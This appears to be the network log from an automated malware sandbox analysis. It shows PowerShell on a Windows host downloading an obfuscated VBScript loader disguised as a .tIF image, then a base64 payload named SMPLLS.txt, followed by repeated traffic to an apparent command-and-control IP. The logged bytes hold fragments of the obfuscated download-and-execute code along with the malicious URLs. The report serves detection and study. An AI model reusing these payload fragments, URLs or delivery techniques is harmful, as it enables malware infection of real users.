Nov 15, 2024 18:15:57.347786903 CET	50050	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:57.353445053 CET	80	50050	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:57.353616953 CET	50050	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:57.358592987 CET	80	50050	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:58.301390886 CET	80	50050	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:58.301640034 CET	50050	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:58.307065964 CET	80	50050	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:58.307152033 CET	50050	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:58.458792925 CET	50051	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:58.463711023 CET	80	50051	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:58.463829041 CET	50051	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:58.465945005 CET	50051	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:58.470830917 CET	80	50051	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:58.470890999 CET	50051	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:58.475712061 CET	80	50051	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:59.439821959 CET	80	50051	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:59.440010071 CET	50051	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:59.445467949 CET	80	50051	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:59.445542097 CET	50051	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:59.589395046 CET	50052	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:59.594273090 CET	80	50052	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:59.594382048 CET	50052	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:59.596467018 CET	50052	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:59.601341963 CET	80	50052	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:59.601398945 CET	50052	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:59.606509924 CET	80	50052	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:00.576663971 CET	80	50052	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:00.576895952 CET	50052	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:00.581983089 CET	80	50052	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:00.582056046 CET	50052	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:00.716341019 CET	50053	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:00.721262932 CET	80	50053	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:00.721338987 CET	50053	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:00.723691940 CET	50053	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:00.728557110 CET	80	50053	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:00.728619099 CET	50053	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:00.733477116 CET	80	50053	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:01.676630020 CET	80	50053	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:01.676780939 CET	50053	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:01.682183027 CET	80	50053	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:01.682255030 CET	50053	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:01.821651936 CET	50054	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:01.826844931 CET	80	50054	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:01.826922894 CET	50054	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:01.829083920 CET	50054	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:01.834808111 CET	80	50054	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:01.834857941 CET	50054	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:01.839648962 CET	80	50054	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:02.802675962 CET	80	50054	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:02.815850019 CET	50054	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:02.821049929 CET	80	50054	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:02.821135044 CET	50054	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:03.152708054 CET	50055	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:03.157660961 CET	80	50055	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:03.157768011 CET	50055	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:03.160758018 CET	50055	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:03.165570021 CET	80	50055	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:03.165663004 CET	50055	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:03.170471907 CET	80	50055	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:04.169306993 CET	80	50055	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:04.169498920 CET	50055	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:04.174978018 CET	80	50055	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:04.175077915 CET	50055	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:04.322495937 CET	50056	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:04.330107927 CET	80	50056	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:04.330195904 CET	50056	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:04.332446098 CET	50056	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:04.337307930 CET	80	50056	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:04.337363958 CET	50056	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:04.346070051 CET	80	50056	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:05.363466024 CET	80	50056	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:05.363656044 CET	50056	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:05.368968964 CET	80	50056	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:05.369039059 CET	50056	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:05.511528969 CET	50057	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:05.516443968 CET	80	50057	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:05.516511917 CET	50057	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:05.830832958 CET	50057	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:05.835798025 CET	80	50057	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:05.839273930 CET	50057	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:05.844158888 CET	80	50057	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:06.516520977 CET	80	50057	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:06.517735004 CET	50057	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:16:06.523288012 CET	80	50057	94.156.177.95	192.168.2.5
Nov 15, 2024 18:16:06.524100065 CET	50057	80	192.168.2.5	94.156.177.95

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 18:14:13.835386038 CET	52654	53	192.168.2.5	1.1.1.1
Nov 15, 2024 18:14:13.850066900 CET	53	52654	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 15, 2024 18:14:13.835386038 CET	192.168.2.5	1.1.1.1	0xf64b	Standard query (0)	1017.filemail.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 15, 2024 18:14:13.850066900 CET	1.1.1.1	192.168.2.5	0xf64b	No error (0)	1017.filemail.com	ip.1017.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 18:14:13.850066900 CET	1.1.1.1	192.168.2.5	0xf64b	No error (0)	ip.1017.filemail.com		142.215.209.78	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

1017.filemail.com

192.3.243.136

94.156.177.95

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	192.3.243.136	80	3160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:08.233702898 CET	329	OUT	GET /32/seemybestthingswithentirelifetimethingstodomybest.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 192.3.243.136 Connection: Keep-Alive
Nov 15, 2024 18:14:08.904371023 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 17:14:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 15 Nov 2024 07:20:09 GMT ETag: "22a26-626ee659e8109" Accept-Ranges: bytes Content-Length: 141862 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 64 00 65 00 73 00 65 00 6d 00 70 00 65 00 6e 00 6f 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 61 00 72 00 72 00 61 00 6d 00 65 00 6c 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 73 00 6f 00 6d 00 62 00 72 00 6f 00 73 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 70 00 6f 00 72 00 71 00 75 00 65 00 74 00 65 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 61 00 66 00 61 00 6d 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 61 00 66 00 61 00 6d 00 61 00 72 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 63 00 61 00 72 00 72 00 61 00 6d 00 65 00 6c 00 6f 00 2c 00 20 00 73 00 6f 00 6d 00 62 00 72 00 6f 00 73 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 61 00 66 00 61 00 6d 00 61 00 72 00 20 00 3e 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 [TRUNCATED] Data Ascii: Function desempeno(ByVal carramelo, ByVal sombroso, ByVal porquetes) Dim afamar afamar = InStr(carramelo, sombroso) Do While afamar > 0 carramelo = Left(carramelo, afamar - 1) & porquetes & Mid(carramelo, afamar + Len(sombroso)) afamar = InStr(afamar + Len(porquetes), carramelo, sombroso) Loop desempeno = carrameloEnd Functionprivate function ReadStdIn() while Not stdIn.AtEndOfStream
Nov 15, 2024 18:14:08.904465914 CET	1236	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 3d 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 26 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 52 00 65 00 61 Data Ascii: ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not rhinocephalia() Then
Nov 15, 2024 18:14:08.904547930 CET	1236	IN	Data Raw: 00 4d 00 44 00 6b 00 77 00 4e 00 47 00 59 00 67 00 62 00 31 00 52 00 42 00 4f 00 79 00 63 00 72 00 4a 00 33 00 42 00 33 00 5a 00 33 00 64 00 6c 00 59 00 6b 00 4e 00 73 00 61 00 57 00 56 00 75 00 64 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47 Data Ascii: MDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudMWKNAZCGSPYFLJOCA9IE5ldy1PYmplY3QgU3lzdGVtLMWKNAZCGSPYFLJOk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2V
Nov 15, 2024 18:14:08.904683113 CET	1236	IN	Data Raw: 00 68 00 5a 00 79 00 6b 00 37 00 63 00 48 00 64 00 6e 00 4a 00 79 00 73 00 6e 00 63 00 33 00 52 00 68 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 62 00 72 00 65 00 6a 00 61 00 6c 00 20 00 3d 00 20 00 62 00 72 00 65 00 6a Data Ascii: hZyk7cHdnJysnc3Rh" brejal = brejal & "cnRJbMWKNAZCGSPYFLJOmRlMWKNAZCGSPYFLJOeCAtZ2UgMCAtYW5kMWKNAZCGSPYFLJOIHB3Z
Nov 15, 2024 18:14:08.904761076 CET	848	IN	Data Raw: 00 6e 00 58 00 79 00 42 00 39 00 4b 00 56 00 73 00 74 00 4d 00 53 00 34 00 75 00 4c 00 53 00 68 00 77 00 64 00 32 00 64 00 69 00 59 00 58 00 4e 00 6c 00 4e 00 6a 00 52 00 44 00 62 00 32 00 31 00 74 00 59 00 57 00 35 00 6b 00 4c 00 6b 00 78 00 6c Data Ascii: nXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJp
Nov 15, 2024 18:14:08.904864073 CET	1236	IN	Data Raw: 00 46 00 4a 00 62 00 31 00 52 00 42 00 4b 00 54 00 74 00 77 00 64 00 32 00 64 00 32 00 59 00 57 00 6b 00 6e 00 4b 00 79 00 64 00 4e 00 5a 00 58 00 52 00 6f 00 62 00 32 00 51 00 75 00 53 00 57 00 35 00 32 00 62 00 32 00 74 00 6c 00 4b 00 48 00 42 Data Ascii: FJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMu" brejal = brejal
Nov 15, 2024 18:14:08.904913902 CET	212	IN	Data Raw: 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f 00 32 00 46 00 30 00 61 00 58 00 5a 00 68 00 5a 00 47 00 39 00 76 00 56 00 45 00 45 00 70 00 4b 00 54 00 73 00 6e 00 4b 00 53 00 35 00 53 00 5a 00 58 00 42 00 4d 00 51 00 4d 00 57 00 4b 00 4e 00 41 Data Ascii: GSPYFLJO2F0aXZhZG9vVEEpKTsnKS5SZXBMQMWKNAZCGSPYFLJOWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFy
Nov 15, 2024 18:14:08.904990911 CET	1236	IN	Data Raw: 00 58 00 54 00 45 00 78 00 4d 00 53 00 74 00 62 00 51 00 32 00 68 00 42 00 63 00 6c 00 30 00 34 00 4e 00 43 00 74 00 62 00 51 00 32 00 68 00 42 00 63 00 6c 00 30 00 32 00 4e 00 53 00 6b 00 73 00 57 00 31 00 4e 00 55 00 63 00 6b 00 6c 00 75 00 5a Data Ascii: XTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk="
Nov 15, 2024 18:14:08.905059099 CET	212	IN	Data Raw: 00 4f 00 24 00 4f 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 72 00 6f 00 6e 00 69 00 71 00 75 00 69 00 7a 00 61 00 72 00 20 Data Ascii: O$OMWKNAZCGSPYFLJO" croniquizar = croniquizar & "WMWKNAZCGSPYFLJOj" croniquizar = croniq
Nov 15, 2024 18:14:08.905271053 CET	1236	IN	Data Raw: 00 75 00 69 00 7a 00 61 00 72 00 20 00 26 00 20 00 22 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f 00 75 00 78 00 4d 00 57 00 4b 00 4e 00 41 00 5a 00 43 00 47 00 53 00 50 00 59 00 46 00 4c 00 4a 00 4f Data Ascii: uizar & "MWKNAZCGSPYFLJOuxMWKNAZCGSPYFLJOd " croniquizar = croniquizar & "=MWKNAZCGSPYFLJO [syMWKNAZCGSPYFLJOs"
Nov 15, 2024 18:14:08.909419060 CET	1236	IN	Data Raw: 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 72 00 6f 00 6e 00 69 00 71 00 75 00 69 00 7a 00 61 00 72 00 20 00 3d 00 20 00 63 00 72 00 6f 00 6e 00 69 00 71 00 75 00 69 00 7a 00 61 00 72 00 20 00 26 00 20 00 22 00 46 00 38 00 4d Data Ascii: croniquizar = croniquizar & "F8MWKNAZCGSPYFLJO." croniquizar = croniquizar & "GeMWKNAZCGSPYFLJOt"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49748	192.3.243.136	80	5536	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:28.735898972 CET	76	OUT	GET /32/SMPLLS.txt HTTP/1.1 Host: 192.3.243.136 Connection: Keep-Alive
Nov 15, 2024 18:14:29.780296087 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 17:14:29 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 15 Nov 2024 07:15:11 GMT ETag: "22aac-626ee53dbb4e2" Accept-Ranges: bytes Content-Length: 141996 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780373096 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780422926 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780472040 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780519962 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780566931 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780618906 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780690908 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780741930 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:29.780796051 CET	1236	IN	Data Raw: 43 4a 6b 51 2b 76 39 32 6f 63 36 33 73 34 2f 32 62 54 30 45 2b 41 77 46 47 47 6b 51 43 4a 70 51 43 70 2b 31 42 67 50 41 53 4b 41 4b 42 41 64 2b 43 4a 6b 30 58 48 41 2b 41 49 6b 51 43 4a 6b 47 35 42 4d 51 43 4a 6b 51 43 67 53 41 51 6e 76 64 2f 39 Data Ascii: CJkQ+v92oc63s4/2bT0E+AwFGGkQCJpQCp+1BgPASKAKBAd+CJk0XHA+AIkQCJkG5BMQCJkQCgSAQnvd/9//vLkQCJkQCJkQCJkfRCJ09PkQCJkQCJYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
